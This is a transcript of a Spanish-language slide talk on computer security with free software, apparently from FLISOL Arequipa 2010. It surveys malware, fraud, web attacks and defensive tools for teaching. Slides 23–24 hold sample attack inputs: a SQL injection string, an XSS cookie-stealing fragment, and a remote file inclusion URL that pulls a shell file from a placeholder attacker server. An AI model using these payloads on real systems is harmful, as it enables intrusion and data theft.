seguridad informatica con software libre

34
Seguridad Informatica con Software Libre Juan Alfredo Salas Santillana

Upload: juan-salas-santillana

Post on 09-Jul-2015

1.148 views

Category:

Technology


1 download

DESCRIPTION

Ponencia "Seguridad informatica con software libre" para la "Flisol Arequipa 2010" por Juan Alfredo Salas Santillana".

TRANSCRIPT

Page 1: Seguridad informatica Con Software Libre

Seguridad Informatica con Software Libre

Juan Alfredo Salas Santillana

Page 2: Seguridad informatica Con Software Libre

AGENDA

¿Seguridad Informatica?

Nivel Usuario

- Tipos de Amenazas - Algunos Numeros

- Medidas Basicas a Tomar

Nivel Administrador, Desarrollador – Servidores

- Tipos de Ataques - Factores Fisicos y Otros

- Medidas Basicas a Tomar - Como Ocultarte

Algunas Demostraciones

Ethical Hacking

Recomendaciones

Page 3: Seguridad informatica Con Software Libre

¿Seguridad Informatica?

Integridad

Confidencialidad

Disponibilidad

No Repudio

Page 4: Seguridad informatica Con Software Libre

Tipos de Amenazas

Malware

Fraudes

Page 5: Seguridad informatica Con Software Libre

Amenazas: Malware

VirusKeyloggersTroyanosGusanosSpywareRootkits

Page 6: Seguridad informatica Con Software Libre

Malware: Virus

Destruccion

Replicación mediante usuario

Page 7: Seguridad informatica Con Software Libre

Malware: Keyloggers

Capturan:

-Pulsación de Teclas

-Clicks del Mouse

Page 8: Seguridad informatica Con Software Libre

Malware: Troyanos

Era un Metodo de Infección

Procesos Ocultos

Administración Remota

Se Juntan con Aplicaciones Utiles

Page 9: Seguridad informatica Con Software Libre

Malware: Gusanos

Autoreplicacion

Autopropagación

Aprobechan bugs

Page 10: Seguridad informatica Con Software Libre

Malware: Spyware

Recolectan:

Cache, Contraseñas

Usualmente son barras

Page 11: Seguridad informatica Con Software Libre

Malware: Rootkits

- Consiguen: Privilegios

- Permiten Correr Programas como Root (Administrador)

Page 12: Seguridad informatica Con Software Libre

Amenaza: Fraude

Phishing

Phraming

Skimming

Ingenieria Social Como Tal

Page 13: Seguridad informatica Con Software Libre

Fraude: Phishing

Pesca Victimas

Robar Información

Por: Email (SPAM)

Page 14: Seguridad informatica Con Software Libre

Fraude: Pharming

Envia a una Pagina falsa

Modifica:

”Hosts”

”Cache de DNS”

Page 15: Seguridad informatica Con Software Libre

Fraude: Skimming

Clonación de Tarjetas

Mediante Cajeros

Page 16: Seguridad informatica Con Software Libre

Fraude: Ingenieria Social

Usar la Palabra para convencer

Principios: A Todo nos Gusta que nos Alagen

No nos Gusta Decir ”NO”

Siempre un Gesto de Confianza

Page 17: Seguridad informatica Con Software Libre

Medidas Basicas

Antivirus

Firewall

Filtro AntiSpam

Page 18: Seguridad informatica Con Software Libre

Medidas Basicas: Antivirus

CLAMAV

- Plataforma: Windows- Licencia: GPL- Monitoreo Permanente- Actualizaciones Frecuentes- No Consume Mucha Memoria

Dr. Web (Livecd)

- Plataforma: GNU / Linux- Licencia: GPL- Modo: Booteo- Analiza fuera de Windows

Page 19: Seguridad informatica Con Software Libre

Medidas Basicas: Firewall

Aislamiento

Registro de Uso

Reglas de Transmision

Page 20: Seguridad informatica Con Software Libre

Algunos Numeros

Virus Indetectable: $100 - $300

Cuenta de Correo Robado: $10 - $100

Tarjeta de Credito Robada: $1000

Page 21: Seguridad informatica Con Software Libre

Tipos de Ataques

DOS

Mediante Web

Explotación de bugs

Page 22: Seguridad informatica Con Software Libre

Ataques: DOS

Tratan de Colapsar un Servicio

Algunos Abren Gran Cantidad de sockets

Algunos Realizados Desde una ”Netbot”

Page 23: Seguridad informatica Con Software Libre

Ataques: Mediante Web

Inyeccion SQL

Filtrado Incorrecto de Variables

Ejemplo: '' OR '1'='1'

XSS

Filtrado Incorrecto de Etiquetas

No Afecta en si al Servidor, Solo al Usuario

Ejemplo: $cookie = $_GET[\'cookie\'];

Page 24: Seguridad informatica Con Software Libre

Ataques: Mediante Web

CSRF

Explota la Confianza de la Aplicacion a un Usuario

RFI

Explotable por la mala programacion de ”Include()”Ejemplo: http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt&&cmd=ls

Page 25: Seguridad informatica Con Software Libre

Ataques: Explotacion de Bugs

Usan Vulnerabilidades conocidas

Se corre un script

Puede ser Relizado por un Aprendiz

Page 26: Seguridad informatica Con Software Libre

Medidas Basicas

Firewall

Test de Penetración

Filtrado de Variables

Page 27: Seguridad informatica Con Software Libre

Medidas Basicas: Firewall

IPTABLES

Incluido en el Kernel Linux

Registro de Logs

FIRESTARTER

Licencia: GPL

Facil manejo y configuración

Page 28: Seguridad informatica Con Software Libre

Medidas Basicas: Test de Pentración

NMAP

Escaner de puertos, SO y mas.

Licencia: GPL

METASPLOIT F.

Framework que permite explotar vulnerabilidades.

NESSUS

Escaner de vulnerabilidades

Page 29: Seguridad informatica Con Software Libre

Medidas Basicas: Filtrado de Variables

Page 30: Seguridad informatica Con Software Libre

Factores Fisicos y Otros

Incendios

Inundaciones

Robo Fisico

Defectos y Daños de Hardware

Page 31: Seguridad informatica Con Software Libre

Como Ocultarte

Tor

Page 32: Seguridad informatica Con Software Libre

Algunas Demostraciones

Page 33: Seguridad informatica Con Software Libre

Ethical Hacking

Pasion

Libertad

Conciencia Social

"Ningún problema debería resolverse 2 veces"

Page 34: Seguridad informatica Con Software Libre

Recomendaciones

Nada es 100% Seguro

Filtrar tu Informacion

Encripta tu Informacion

Revisa tus Logs

Nunca Pienses que Nadie se Tomara el Trabajo de Hacerlo